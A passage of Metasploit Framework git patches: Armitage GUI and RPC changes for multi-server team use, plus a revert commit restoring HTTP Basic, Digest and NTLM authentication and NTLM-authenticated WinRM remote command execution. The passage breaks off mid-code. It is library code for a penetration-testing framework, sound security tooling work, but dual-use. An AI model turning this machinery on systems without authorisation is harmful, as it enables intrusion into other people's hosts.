100644 --- a/external/source/armitage/src/msf/RpcConnectionImpl.java +++ b/external/source/armitage/src/msf/RpcConnectionImpl.java @@ -84,12 +84,40 @@ public Object execute(String methodName) throws IOException { } protected HashMap locks = new HashMap(); + protected String address = ""; + + public String getLocalAddress() { + return address; + } /** Adds token, runs command, and notifies logger on call and return */ public Object execute(String methodName, Object[] params) throws IOException { if (database != null && "db.".equals(methodName.substring(0, 3))) { return database.execute(methodName, params); } + else if (methodName.equals("armitage.ping")) { + try { + long time = System.currentTimeMillis() - Long.parseLong(params[0] + ""); + + HashMap res = new HashMap(); + res.put("result", time + ""); + return res; + } + catch (Exception ex) { + HashMap res = new HashMap(); + res.put("result", "0"); + return res; + } + } + else if (methodName.equals("armitage.my_ip")) { + HashMap res = new HashMap(); + res.put("result", address); + return res; + } + else if (methodName.equals("armitage.set_ip")) { + address = params[0] + ""; + return new HashMap(); + } else if (methodName.equals("armitage.lock")) { if (locks.containsKey(params[0] + "")) { Map res = new HashMap(); diff --git a/external/source/armitage/src/msf/RpcQueue.java b/external/source/armitage/src/msf/RpcQueue.java index ba657c26716b..b56d2a2135a1 100644 --- a/external/source/armitage/src/msf/RpcQueue.java +++ b/external/source/armitage/src/msf/RpcQueue.java @@ -66,7 +66,7 @@ public void run() { Thread.sleep(50); } else { - Thread.sleep(500); + Thread.sleep(200); } } } diff --git a/external/source/armitage/src/table/NetworkTable.java b/external/source/armitage/src/table/NetworkTable.java index 2d7590db0e13..c89bd97dbb87 100644 --- a/external/source/armitage/src/table/NetworkTable.java +++ b/external/source/armitage/src/table/NetworkTable.java @@ -1,11 +1,11 @@ package table; -import javax.swing.*; -import javax.swing.event.*; +import javax.swing.*; +import javax.swing.event.*; import javax.swing.border.*; import javax.swing.table.*; -import java.awt.*; +import java.awt.*; import java.awt.event.*; import java.awt.image.*; @@ -92,7 +92,7 @@ public boolean equals(Object a, Object b) { table.getColumn("Description").setPreferredWidth(500); final TableCellRenderer parent = table.getDefaultRenderer(Object.class); - table.setDefaultRenderer(Object.class, new TableCellRenderer() { + final TableCellRenderer phear = new TableCellRenderer() { public Component getTableCellRendererComponent(JTable table, Object value, boolean isSelected, boolean hasFocus, int row, int col) { JLabel component = (JLabel)parent.getTableCellRendererComponent(table, value, isSelected, false, row, col); @@ -111,9 +111,15 @@ else if (col == 1 && !"".equals(model.getValueAt(table, row, "Description"))) { if (tip.length() > 0) { component.setToolTipText(tip); } + return component; } - }); + }; + + table.getColumn("Address").setCellRenderer(phear); + table.getColumn("Label").setCellRenderer(phear); + table.getColumn("Description").setCellRenderer(phear); + table.getColumn("Pivot").setCellRenderer(phear); table.getColumn(" ").setCellRenderer(new TableCellRenderer() { public Component getTableCellRendererComponent(JTable table, Object value, boolean isSelected, boolean hasFocus, int row, int col) { diff --git a/external/source/armitage/src/ui/MultiFrame.java b/external/source/armitage/src/ui/MultiFrame.java new file mode 100644 index 000000000000..96bea014f1d7 --- /dev/null +++ b/external/source/armitage/src/ui/MultiFrame.java @@ -0,0 +1,238 @@ +package ui; + +import javax.swing.*; +import javax.swing.event.*; + +import java.awt.*; +import java.awt.event.*; + +import java.util.*; + +import armitage.ArmitageApplication; +import msf.*; + +/* A class to host multiple Armitage instances in one frame. Srsly */ +public class MultiFrame extends JFrame implements KeyEventDispatcher { + protected JToolBar toolbar; + protected JPanel content; + protected CardLayout cards; + protected LinkedList buttons; + + private static class ArmitageInstance { + public ArmitageApplication app; + public JToggleButton button; + public RpcConnection client; + } + + public Map getClients() { + synchronized (buttons) { + Map r = new HashMap(); + + Iterator i = buttons.iterator(); + while (i.hasNext()) { + ArmitageInstance temp = (ArmitageInstance)i.next(); + r.put(temp.button.getText(), temp.client); + } + return r; + } + } + + public void setTitle(ArmitageApplication app, String title) { + if (active == app) + setTitle(title); + } + + protected ArmitageApplication active; + + /* is localhost running? */ + public boolean checkLocal() { + synchronized (buttons) { + Iterator i = buttons.iterator(); + while (i.hasNext()) { + ArmitageInstance temp = (ArmitageInstance)i.next(); + if ("localhost".equals(temp.button.getText())) { + return true; + } + } + return false; + } + } + + public boolean dispatchKeyEvent(KeyEvent ev) { + if (active != null) { + return active.getBindings().dispatchKeyEvent(ev); + } + return false; + } + + public static final void setupLookAndFeel() { + try { + for (UIManager.LookAndFeelInfo info : UIManager.getInstalledLookAndFeels()) { + if ("Nimbus".equals(info.getName())) { + UIManager.setLookAndFeel(info.getClassName()); + break; + } + } + } + catch (Exception e) { + } + } + + public void closeConnect() { + synchronized (buttons) { + if (buttons.size() == 0) { + System.exit(0); + } + } + } + + public void quit() { + synchronized (buttons) { + ArmitageInstance temp = null; + content.remove(active); + Iterator i = buttons.iterator(); + while (i.hasNext()) { + temp = (ArmitageInstance)i.next(); + if (temp.app == active) { + toolbar.remove(temp.button); + i.remove(); + break; + } + } + + if (buttons.size() == 0) { + System.exit(0); + } + else if (buttons.size() == 1) { + remove(toolbar); + validate(); + } + + if (i.hasNext()) { + temp = (ArmitageInstance)i.next(); + } + else { + temp = (ArmitageInstance)buttons.getFirst(); + } + + set(temp.button); + } + } + + public MultiFrame() { + super(""); + + setLayout(new BorderLayout()); + + /* setup our toolbar */ + toolbar = new JToolBar(); + + /* content area */ + content = new JPanel(); + cards = new CardLayout(); + content.setLayout(cards); + + /* setup our stuff */ + add(content, BorderLayout.CENTER); + + /* buttons?!? :) */ + buttons = new LinkedList(); + + /* do this ... */ + setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE); + + /* some basic setup */ + setSize(800, 600); + setExtendedState(JFrame.MAXIMIZED_BOTH); + + /* all your keyboard shortcuts are belong to me */ + KeyboardFocusManager.getCurrentKeyboardFocusManager().addKeyEventDispatcher(this); + } + + protected void set(JToggleButton button) { + synchronized (buttons) { + /* set all buttons to the right state */ + Iterator i = buttons.iterator(); + while (i.hasNext()) { + ArmitageInstance temp = (ArmitageInstance)i.next(); + if (temp.button.getText().equals(button.getText())) { + temp.button.setSelected(true); + active = temp.app; + setTitle(active.getTitle()); + } + else { + temp.button.setSelected(false); + } + } + + /* show our cards? */ + cards.show(content, button.getText()); + active.touch(); + } + } + + public void addButton(String title, final ArmitageApplication component, RpcConnection conn) { + synchronized (buttons) { + final ArmitageInstance a = new ArmitageInstance(); + a.button = new JToggleButton(title); + a.button.setToolTipText(title); + a.app = component; + a.client = conn; + + a.button.addActionListener(new ActionListener() { + public void actionPerformed(ActionEvent ev) { + set((JToggleButton)ev.getSource()); + } + }); + + a.button.addMouseListener(new MouseAdapter() { + public void check(MouseEvent ev) { + if (ev.isPopupTrigger()) { + final JToggleButton source = a.button; + JPopupMenu popup = new JPopupMenu(); + JMenuItem rename = new JMenuItem("Rename"); + rename.addActionListener(new ActionListener() { + public void actionPerformed(ActionEvent ev) { + String name = JOptionPane.showInputDialog("Rename to?", source.getText()); + if (name != null) { + content.remove(component); + content.add(component, name); + source.setText(name); + set(source); + } + } + }); + popup.add(rename); + popup.show((JComponent)ev.getSource(), ev.getX(), ev.getY()); + ev.consume(); + } + } + + public void mouseClicked(MouseEvent ev) { + check(ev); + } + + public void mousePressed(MouseEvent ev) { + check(ev); + } + + public void mouseReleased(MouseEvent ev) { + check(ev); + } + }); + + toolbar.add(a.button); + content.add(component, title); + buttons.add(a); + set(a.button); + + if (buttons.size() == 1) { + show(); + } + else if (buttons.size() == 2) { + add(toolbar, BorderLayout.SOUTH); + } + validate(); + } + } +} diff --git a/external/source/armitage/whatsnew.txt b/external/source/armitage/whatsnew.txt index c1e03e579b70..55804871ffbd 100644 --- a/external/source/armitage/whatsnew.txt +++ b/external/source/armitage/whatsnew.txt @@ -1,6 +1,29 @@ Armitage Changelog ================== +12 Feb 13 (tested against msf 16438) +--------- +- Fixed a corner case preventing the display of removed host labels + when connected to a team server. +- Fixed RPC call cache corruption in team server mode. This bug could + lead to some exploits defaulting to a shell payload when meterpreter + was a possibility. +- Slight optimization to some DB queries. I no longer pull unused + fields making the query marginally faster. Team server is more + efficient too as changes to unused fields won't force data (re)sync. +- Hosts -> Clear Database now clears host labels too. +- Added the ability to manage multiple team server instances through + Armitage. Go to Armitage -> New Connection to connect to another + server. A button bar will appear that allows you to switch active + Armitage connections. + - Credentials available across instances are pooled when using + the [host] -> Login menu and the credential helper. +- Rewrote the event log management code in the team server +- Added nickname tab completion to event log. I feel like I'm writing + an IRC client again. +- Hosts -> Clear Database now asks you to confirm the action. +- Hosts -> Import Hosts announces successful import to event log again. + 23 Jan 13 (tested against msf 16351) --------- - Added helpers to set EXE::Custom and EXE::Template options. From 8ddc19e8421b94995d76f9c9addc7266f119f86e Mon Sep 17 00:00:00 2001 From: Tod Beardsley <todb@metasploit.com> Date: Mon, 11 Feb 2013 20:49:55 -0600 Subject: [PATCH 364/421] Unmerge #1476 and #1444 In that order. #1476 was an attempt to salvage the functionality, but sinn3r found some more bugs. So, undoing that, and undoing #1444 as well. First, do no harm. It's obvious we cannot be making sweeping changes in libraries like this without a minimum of testing available. #1478 starts to address that, by the way. FixRM #7752 --- lib/anemone/rex_http.rb | 4 +- lib/msf/core/auxiliary/crawler.rb | 16 +- lib/msf/core/auxiliary/web/http.rb | 14 +- lib/msf/core/exploit/http/client.rb | 265 +++++++++- lib/msf/core/exploit/mixins.rb | 1 - lib/msf/core/exploit/winrm.rb | 122 ++++- lib/rex/proto/http/client.rb | 488 ++---------------- lib/rex/proto/http/request.rb | 2 - modules/auxiliary/gather/shodan_search.rb | 4 +- .../scanner/http/cisco_device_manager.rb | 4 +- modules/auxiliary/scanner/http/http_login.rb | 186 ++++++- .../scanner/http/tomcat_mgr_login.rb | 10 +- modules/auxiliary/scanner/winrm/winrm_cmd.rb | 4 + .../auxiliary/scanner/winrm/winrm_login.rb | 6 +- modules/auxiliary/scanner/winrm/winrm_wql.rb | 7 +- modules/auxiliary/server/http_ntlmrelay.rb | 3 +- .../linux/http/piranha_passwd_exec.rb | 6 +- modules/exploits/multi/http/axis2_deployer.rb | 4 +- .../exploits/multi/http/jboss_bshdeployer.rb | 3 + .../exploits/multi/http/jboss_maindeployer.rb | 3 + .../exploits/multi/http/tomcat_mgr_deploy.rb | 14 +- .../unix/webapp/oracle_vm_agent_utl.rb | 3 + modules/exploits/windows/http/easyftp_list.rb | 4 +- .../windows/http/xampp_webdav_upload_php.rb | 10 +- .../windows/winrm/winrm_script_exec.rb | 24 +- 25 files changed, 650 insertions(+), 557 deletions(-) diff --git a/lib/anemone/rex_http.rb b/lib/anemone/rex_http.rb index f606f289fc27..ce6a71a17ff7 100644 --- a/lib/anemone/rex_http.rb +++ b/lib/anemone/rex_http.rb @@ -188,9 +188,7 @@ def connection(url) context, url.scheme == "https", 'SSLv23', - @opts[:proxies], - @opts[:username], - @opts[:password] + @opts[:proxies] ) conn.set_config( diff --git a/lib/msf/core/auxiliary/crawler.rb b/lib/msf/core/auxiliary/crawler.rb index 86792381ed24..36e963ecbc8f 100644 --- a/lib/msf/core/auxiliary/crawler.rb +++ b/lib/msf/core/auxiliary/crawler.rb @@ -22,9 +22,7 @@ def initialize(info = {}) Opt::Proxies, OptInt.new('MAX_PAGES', [ true, 'The maximum number of pages to crawl per URL', 500]), OptInt.new('MAX_MINUTES', [ true, 'The maximum number of minutes to spend on each URL', 5]), - OptInt.new('MAX_THREADS', [ true, 'The maximum number of concurrent requests', 4]), - OptString.new('USERNAME', [false, 'The HTTP username to specify for authentication']), - OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication']) + OptInt.new('MAX_THREADS', [ true, 'The maximum number of concurrent requests', 4]) ], self.class ) @@ -36,6 +34,8 @@ def initialize(info = {}) OptString.new('UserAgent', [true, 'The User-Agent header to use for all requests', "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" ]), + OptString.new('BasicAuthUser', [false, 'The HTTP username to specify for basic authentication']), + OptString.new('BasicAuthPass', [false, 'The HTTP password to specify for basic authentication']), OptString.new('HTTPAdditionalHeaders', [false, "A list of additional headers to send (separated by \\x01)"]), OptString.new('HTTPCookie', [false, "A HTTP cookie header to send with each request"]), OptBool.new('SSL', [ false, 'Negotiate SSL for outgoing connections', false]), @@ -118,9 +118,8 @@ def run :info => "" }) - if datastore['USERNAME'] and datastore['USERNAME'] != '' - t[:username] = datastore['USERNAME'].to_s - t[:password] = datastore['PASSWORD'].to_s + if datastore['BasicAuthUser'] + t[:http_basic_auth] = [ "#{datastore['BasicAuthUser']}:#{datastore['BasicAuthPass']}" ].pack("m*").gsub(/\s+/, '') end if datastore['HTTPCookie'] @@ -279,8 +278,9 @@ def crawler_options(t) opts[:cookies] = t[:cookies] end - opts[:username] = t[:username] || '' - opts[:password] =t[:password] || '' + if t[:http_basic_auth] + opts[:http_basic_auth] = t[:http_basic_auth] + end opts end diff --git a/lib/msf/core/auxiliary/web/http.rb b/lib/msf/core/auxiliary/web/http.rb index 03411e286e20..a7c8fc86e38c 100644 --- a/lib/msf/core/auxiliary/web/http.rb +++ b/lib/msf/core/auxiliary/web/http.rb @@ -10,7 +10,6 @@ module Msf class Auxiliary::Web::HTTP - class Request attr_accessor :url attr_reader :opts @@ -70,7 +69,6 @@ def timed_out attr_reader :framework attr_accessor :redirect_limit - attr_accessor :username , :password def initialize( opts = {} ) @opts = opts.dup @@ -86,8 +84,8 @@ def initialize( opts = {} ) @request_opts = {} if opts[:auth].is_a? Hash - @username = opts[:auth][:user].to_s - @password = opts[:auth][:password].to_s + @request_opts['basic_auth'] = [ opts[:auth][:user].to_s + ':' + + opts[:auth][:password] ]. pack( 'm*' ).gsub( /\s+/, '' ) end self.redirect_limit = opts[:redirect_limit] || 20 @@ -107,9 +105,7 @@ def connect opts[:target].port, {}, opts[:target].ssl, - 'SSLv23', - username, - password + 'SSLv23' ) c.set_config({ @@ -300,10 +296,6 @@ def _request( url, opts = {} ) opts['data'] = body if body c = connect - if opts['username'] and opts['username'] != '' - c.username = opts['username'].to_s - c.password = opts['password'].to_s - end Response.from_rex_response c.send_recv( c.request_cgi( opts ), timeout ) rescue ::Timeout::Error Response.timed_out diff --git a/lib/msf/core/exploit/http/client.rb b/lib/msf/core/exploit/http/client.rb index 293a4acd4cc0..6d0bd9336b51 100644 --- a/lib/msf/core/exploit/http/client.rb +++ b/lib/msf/core/exploit/http/client.rb @@ -37,9 +37,7 @@ def initialize(info = {}) Opt::RHOST, Opt::RPORT(80), OptString.new('VHOST', [ false, "HTTP server virtual host" ]), - Opt::Proxies, - OptString.new('USERNAME', [false, 'The HTTP username to specify for authentication', '']), - OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication', '']), + Opt::Proxies ], self.class ) @@ -48,6 +46,10 @@ def initialize(info = {}) OptString.new('UserAgent', [false, 'The User-Agent header to use for all requests', Rex::Proto::Http::Client::DefaultUserAgent ]), + OptString.new('BasicAuthUser', [false, 'The HTTP username to specify for basic authentication']), + OptString.new('BasicAuthPass', [false, 'The HTTP password to specify for basic authentication']), + OptString.new('DigestAuthUser', [false, 'The HTTP username to specify for digest authentication']), + OptString.new('DigestAuthPassword', [false, 'The HTTP password to specify for digest authentication']), OptBool.new('DigestAuthIIS', [false, 'Conform to IIS, should work for most servers. Only set to false for non-IIS servers', true]), OptBool.new('SSL', [ false, 'Negotiate SSL for outgoing connections', false]), OptEnum.new('SSLVersion', [ false, 'Specify the version of SSL that should be used', 'SSL3', ['SSL2', 'SSL3', 'TLS1']]), @@ -154,9 +156,7 @@ def connect(opts={}) }, dossl, ssl_version, - proxies, - datastore['USERNAME'], - datastore['PASSWORD'] + proxies ) # Configure the HTTP client with the supplied parameter @@ -184,15 +184,7 @@ def connect(opts={}) 'pad_post_params_count' => datastore['HTTP::pad_post_params_count'], 'uri_fake_end' => datastore['HTTP::uri_fake_end'], 'uri_fake_params_start' => datastore['HTTP::uri_fake_params_start'], - 'header_folding' => datastore['HTTP::header_folding'], - 'usentlm2_session' => datastore['NTLM::UseNTLM2_session'], - 'use_ntlmv2' => datastore['NTLM::UseNTLMv2'], - 'send_lm' => datastore['NTLM::SendLM'], - 'send_ntlm' => datastore['NTLM::SendNTLM'], - 'SendSPN' => datastore['NTLM::SendSPN'], - 'UseLMKey' => datastore['NTLM::UseLMKey'], - 'domain' => datastore['DOMAIN'], - 'DigestAuthIIS' => datastore['DigestAuthIIS'] + 'header_folding' => datastore['HTTP::header_folding'] ) # If this connection is global, persist it @@ -274,10 +266,6 @@ def send_request_raw(opts={}, timeout = 20) def send_request_cgi(opts={}, timeout = 20) begin c = connect(opts) - if opts['username'] and opts['username'] != '' - c.username = opts['username'].to_s - c.password = opts['password'].to_s - end r = c.request_cgi(opts) c.send_recv(r, opts[:timeout] ? opts[:timeout] : timeout) rescue ::Errno::EPIPE, ::Timeout::Error @@ -289,8 +277,241 @@ def send_request_cgi(opts={}, timeout = 20) # Combine the user/pass into an auth string for the HTTP Client # def basic_auth - return if not datastore['USERNAME'] - datastore['USERNAME'].to_s + ":" + (datastore['PASSWORD'].to_s || '') + return if not datastore['BasicAuthUser'] + datastore['BasicAuthUser'] + ":" + (datastore['BasicAuthPass'] || '') + end + + # + # Connect to the server, and perform NTLM authentication for this session. + # Note the return value is [resp,c], so the caller can have access to both + # the last response, and the connection itself -- this is important since + # NTLM auth is bound to this particular TCP session. + # + # TODO: Fix up error messaging a lot more -- right now it's pretty hard + # to tell what all went wrong. + # + def send_http_auth_ntlm(opts={}, timeout = 20) + #ntlm_message_1 = "NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=" + ntlm_options = { + :signing => false, + :usentlm2_session => datastore['NTLM::UseNTLM2_session'], + :use_ntlmv2 => datastore['NTLM::UseNTLMv2'], + :send_lm => datastore['NTLM::SendLM'], + :send_ntlm => datastore['NTLM::SendNTLM'] + } + + ntlmssp_flags = NTLM_UTILS.make_ntlm_flags(ntlm_options) + workstation_name = Rex::Text.rand_text_alpha(rand(8)+1) + domain_name = datastore['DOMAIN'] + + ntlm_message_1 = "NTLM " + Rex::Text::encode_base64(NTLM_UTILS::make_ntlmssp_blob_init( domain_name, + workstation_name, + ntlmssp_flags)) + to = opts[:timeout] || timeout + begin + c = connect(opts) + + # First request to get the challenge + r = c.request_cgi(opts.merge({ + 'uri' => opts['uri'], + 'method' => 'GET', + 'headers' => { 'Authorization' => ntlm_message_1 }})) + resp = c.send_recv(r, to) + unless resp.kind_of? Rex::Proto::Http::Response + return [nil,nil] + end + return [nil,nil] if resp.code == 404 + return [nil,nil] unless resp.code == 401 && resp.headers['WWW-Authenticate'] + + # Get the challenge and craft the response + ntlm_challenge = resp.headers['WWW-Authenticate'].match(/NTLM ([A-Z0-9\x2b\x2f=]+)/i)[1] + return [nil,nil] unless ntlm_challenge + + + #old and simplier method but not compatible with windows 7/2008r2 + #ntlm_message_2 = Rex::Proto::NTLM::Message.decode64(ntlm_challenge) + #ntlm_message_3 = ntlm_message_2.response( {:user => opts['username'],:password => opts['password']}, {:ntlmv2 => true}) + + ntlm_message_2 = Rex::Text::decode_base64(ntlm_challenge) + blob_data = NTLM_UTILS.parse_ntlm_type_2_blob(ntlm_message_2) + + challenge_key = blob_data[:challenge_key] + server_ntlmssp_flags = blob_data[:server_ntlmssp_flags] #else should raise an error + #netbios name + default_name = blob_data[:default_name] || '' + #netbios domain + default_domain = blob_data[:default_domain] || '' + #dns name + dns_host_name = blob_data[:dns_host_name] || '' + #dns domain + dns_domain_name = blob_data[:dns_domain_name] || '' + #Client time + chall_MsvAvTimestamp = blob_data[:chall_MsvAvTimestamp] || '' + + spnopt = {:use_spn => datastore['NTLM::SendSPN'], :name => self.rhost} + + resp_lm, + resp_ntlm, + client_challenge, + ntlm_cli_challenge = NTLM_UTILS.create_lm_ntlm_responses(opts['username'], opts['password'], challenge_key, + domain_name, default_name, default_domain, + dns_host_name, dns_domain_name, chall_MsvAvTimestamp, + spnopt, ntlm_options) + + ntlm_message_3 = NTLM_UTILS.make_ntlmssp_blob_auth(domain_name, workstation_name, opts['username'], + resp_lm, resp_ntlm, '', ntlmssp_flags) + ntlm_message_3 = Rex::Text::encode_base64(ntlm_message_3) + + # Send the response + r = c.request_cgi(opts.merge({ + 'uri' => opts['uri'], + 'method' => 'GET', + 'headers' => { 'Authorization' => "NTLM #{ntlm_message_3}"}})) + resp = c.send_recv(r, to, true) + unless resp.kind_of? Rex::Proto::Http::Response + return [nil,nil] + end + return [nil,nil] if resp.code == 404 + return [resp,c] + + rescue ::Errno::EPIPE, ::Timeout::Error + end + end + + def send_digest_request_cgi(opts={}, timeout=20) + @nonce_count = 0 + + return [nil,nil] if not (datastore['DigestAuthUser'] or opts['DigestAuthUser']) + to = opts['timeout'] || timeout + + digest_user = datastore['DigestAuthUser'] || opts['DigestAuthUser'] || "" + digest_password = datastore['DigestAuthPassword'] || opts['DigestAuthPassword'] || "" + + method = opts['method'] + path = opts['uri'] + iis = true + if (opts['DigestAuthIIS'] == false or datastore['DigestAuthIIS'] == false) + iis = false + end + + begin + @nonce_count += 1 + + resp = opts['response'] + + if not resp + # Get authentication-challenge from server, and read out parameters required + c = connect(opts) + r = c.request_cgi(opts.merge({ + 'uri' => path, + 'method' => method })) + resp = c.send_recv(r, to) + unless resp.kind_of? Rex::Proto::Http::Response + return [nil,nil] + end + return [nil,nil] if resp.code == 404 + if resp.code != 401 + return resp + end + return [nil,nil] unless resp.headers['WWW-Authenticate'] + end + + # Don't anchor this regex to the beginning of string because header + # folding makes it appear later when the server presents multiple + # WWW-Authentication options (such as is the case with IIS configured + # for Digest or NTLM). + resp['www-authenticate'] =~ /Digest (.*)/ + + parameters = {} + $1.split(/,[[:space:]]*/).each do |p| + k, v = p.split("=", 2) + parameters[k] = v.gsub('"', '') + end + + qop = parameters['qop'] + + if parameters['algorithm'] =~ /(.*?)(-sess)?$/ + algorithm = case $1 + when 'MD5' then Digest::MD5 + when 'SHA1' then Digest::SHA1 + when 'SHA2' then Digest::SHA2 + when 'SHA256' then Digest::SHA256 + when 'SHA384' then Digest::SHA384 + when 'SHA512' then Digest::SHA512 + when 'RMD160' then Digest::RMD160 + else raise Error, "unknown algorithm \"#{$1}\"" + end + algstr = parameters["algorithm"] + sess = $2 + else + algorithm = Digest::MD5 + algstr = "MD5" + sess = false + end + + a1 = if sess then + [ + algorithm.hexdigest("#{digest_user}:#{parameters['realm']}:#{digest_password}"), + parameters['nonce'], + @cnonce + ].join ':' + else + "#{digest_user}:#{parameters['realm']}:#{digest_password}" + end + + ha1 = algorithm.hexdigest(a1) + ha2 = algorithm.hexdigest("#{method}:#{path}") + + request_digest = [ha1, parameters['nonce']] + request_digest.push(('%08x' % @nonce_count), @cnonce, qop) if qop + request_digest << ha2 + request_digest = request_digest.join ':' + + # Same order as IE7 + auth = [ + "Digest username=\"#{digest_user}\"", + "realm=\"#{parameters['realm']}\"", + "nonce=\"#{parameters['nonce']}\"", + "uri=\"#{path}\"", + "cnonce=\"#{@cnonce}\"", + "nc=#{'%08x' % @nonce_count}", + "algorithm=#{algstr}", + "response=\"#{algorithm.hexdigest(request_digest)[0, 32]}\"", + # The spec says the qop value shouldn't be enclosed in quotes, but + # some versions of IIS require it and Apache accepts it. Chrome + # and Firefox both send it without quotes but IE does it this way. + # Use the non-compliant-but-everybody-does-it to be as compatible + # as possible by default. The user can override if they don't like + # it. + if qop.nil? then + elsif iis then + "qop=\"#{qop}\"" + else + "qop=#{qop}" + end, + if parameters.key? 'opaque' then + "opaque=\"#{parameters['opaque']}\"" + end + ].compact + + headers ={ 'Authorization' => auth.join(', ') } + headers.merge!(opts['headers']) if opts['headers'] + + + # Send main request with authentication + r = c.request_cgi(opts.merge({ + 'uri' => path, + 'method' => method, + 'headers' => headers })) + resp = c.send_recv(r, to) + unless resp.kind_of? Rex::Proto::Http::Response + return [nil,nil] + end + + return [resp,c] + + rescue ::Errno::EPIPE, ::Timeout::Error + end end ## @@ -501,4 +722,4 @@ def make_cnonce end -end \ No newline at end of file +end diff --git a/lib/msf/core/exploit/mixins.rb b/lib/msf/core/exploit/mixins.rb index 6b4db3a54ff6..0e10f7a5a26c 100644 --- a/lib/msf/core/exploit/mixins.rb +++ b/lib/msf/core/exploit/mixins.rb @@ -94,4 +94,3 @@ # WebApp require 'msf/core/exploit/web' - diff --git a/lib/msf/core/exploit/winrm.rb b/lib/msf/core/exploit/winrm.rb index 960bff05ce58..72b6a1f7242d 100644 --- a/lib/msf/core/exploit/winrm.rb +++ b/lib/msf/core/exploit/winrm.rb @@ -42,7 +42,7 @@ def winrm_poke(timeout = 20) c = connect(opts) to = opts[:timeout] || timeout ctype = "application/soap+xml;charset=UTF-8" - resp, c = send_winrm_request(opts.merge({ + resp, c = send_request_cgi(opts.merge({ 'uri' => opts['uri'], 'method' => 'POST', 'ctype' => ctype, @@ -61,7 +61,7 @@ def parse_auth_methods(resp) end def winrm_run_cmd(cmd, timeout=20) - resp = send_winrm_request(winrm_open_shell_msg,timeout) + resp,c = send_request_ntlm(winrm_open_shell_msg,timeout) if resp.nil? print_error "Recieved no reply from server" return nil @@ -76,17 +76,17 @@ def winrm_run_cmd(cmd, timeout=20) return retval end shell_id = winrm_get_shell_id(resp) - resp = send_winrm_request(winrm_cmd_msg(cmd, shell_id),timeout) + resp,c = send_request_ntlm(winrm_cmd_msg(cmd, shell_id),timeout) cmd_id = winrm_get_cmd_id(resp) - resp = send_winrm_request(winrm_cmd_recv_msg(shell_id,cmd_id),timeout) + resp,c = send_request_ntlm(winrm_cmd_recv_msg(shell_id,cmd_id),timeout) streams = winrm_get_cmd_streams(resp) - resp = send_winrm_request(winrm_terminate_cmd_msg(shell_id,cmd_id),timeout) - resp = send_winrm_request(winrm_delete_shell_msg(shell_id)) + resp,c = send_request_ntlm(winrm_terminate_cmd_msg(shell_id,cmd_id),timeout) + resp,c = send_request_ntlm(winrm_delete_shell_msg(shell_id)) return streams end def winrm_run_cmd_hanging(cmd, timeout=20) - resp = send_winrm_request(winrm_open_shell_msg,timeout) + resp,c = send_request_ntlm(winrm_open_shell_msg,timeout) if resp.nil? print_error "Recieved no reply from server" return nil @@ -101,9 +101,9 @@ def winrm_run_cmd_hanging(cmd, timeout=20) return retval end shell_id = winrm_get_shell_id(resp) - resp = send_winrm_request(winrm_cmd_msg(cmd, shell_id),timeout) + resp,c = send_request_ntlm(winrm_cmd_msg(cmd, shell_id),timeout) cmd_id = winrm_get_cmd_id(resp) - resp = send_winrm_request(winrm_cmd_recv_msg(shell_id,cmd_id),timeout) + resp,c = send_request_ntlm(winrm_cmd_recv_msg(shell_id,cmd_id),timeout) streams = winrm_get_cmd_streams(resp) return streams end @@ -219,6 +219,98 @@ def generate_uuid ::Rex::Proto::DCERPC::UUID.uuid_unpack(Rex::Text.rand_text(16)) end + def send_request_ntlm(data, timeout = 20) + opts = { + 'uri' => datastore['URI'], + 'data' => data, + 'username' => datastore['USERNAME'], + 'password' => datastore['PASSWORD'] + } + ntlm_options = { + :signing => false, + :usentlm2_session => datastore['NTLM::UseNTLM2_session'], + :use_ntlmv2 => datastore['NTLM::UseNTLMv2'], + :send_lm => datastore['NTLM::SendLM'], + :send_ntlm => datastore['NTLM::SendNTLM'] + } + ntlmssp_flags = NTLM_UTILS.make_ntlm_flags(ntlm_options) + workstation_name = Rex::Text.rand_text_alpha(rand(8)+1) + domain_name = datastore['DOMAIN'] + ntlm_message_1 = "NEGOTIATE " + Rex::Text::encode_base64(NTLM_UTILS::make_ntlmssp_blob_init( domain_name, + workstation_name, + ntlmssp_flags)) + to = opts[:timeout] || timeout + begin + c = connect(opts) + ctype = "application/soap+xml;charset=UTF-8" + # First request to get the challenge + r = c.request_cgi(opts.merge({ + 'uri' => opts['uri'], + 'method' => 'POST', + 'ctype' => ctype, + 'headers' => { 'Authorization' => ntlm_message_1}, + 'data' => opts['data'] + })) + resp = c.send_recv(r, to) + unless resp.kind_of? Rex::Proto::Http::Response + return [nil,nil] + end + return [nil,nil] if resp.code == 404 + return [nil,nil] unless resp.code == 401 && resp.headers['WWW-Authenticate'] + # Get the challenge and craft the response + ntlm_challenge = resp.headers['WWW-Authenticate'].match(/NEGOTIATE ([A-Z0-9\x2b\x2f=]+)/i)[1] + return [nil,nil] unless ntlm_challenge + + #old and simplier method but not compatible with windows 7/2008r2 + #ntlm_message_2 = Rex::Proto::NTLM::Message.decode64(ntlm_challenge) + #ntlm_message_3 = ntlm_message_2.response( {:user => opts['username'],:password => opts['password']}, {:ntlmv2 => true}) + ntlm_message_2 = Rex::Text::decode_base64(ntlm_challenge) + blob_data = NTLM_UTILS.parse_ntlm_type_2_blob(ntlm_message_2) + challenge_key = blob_data[:challenge_key] + server_ntlmssp_flags = blob_data[:server_ntlmssp_flags] #else should raise an error + #netbios name + default_name = blob_data[:default_name] || '' + #netbios domain + default_domain = blob_data[:default_domain] || '' + #dns name + dns_host_name = blob_data[:dns_host_name] || '' + #dns domain + dns_domain_name = blob_data[:dns_domain_name] || '' + #Client time + chall_MsvAvTimestamp = blob_data[:chall_MsvAvTimestamp] || '' + spnopt = {:use_spn => datastore['NTLM::SendSPN'], :name => self.rhost} + resp_lm, + resp_ntlm, + client_challenge, + ntlm_cli_challenge = NTLM_UTILS.create_lm_ntlm_responses(opts['username'], opts['password'], challenge_key, + domain_name, default_name, default_domain, + dns_host_name, dns_domain_name, chall_MsvAvTimestamp, + spnopt, ntlm_options) + ntlm_message_3 = NTLM_UTILS.make_ntlmssp_blob_auth(domain_name, workstation_name, opts['username'], + resp_lm, resp_ntlm, '', ntlmssp_flags) + ntlm_message_3 = Rex::Text::encode_base64(ntlm_message_3) + # Send the response + r = c.request_cgi(opts.merge({ + 'uri' => opts['uri'], + 'method' => 'POST', + 'ctype' => ctype, + 'headers' => { 'Authorization' => "NEGOTIATE #{ntlm_message_3}"}, + 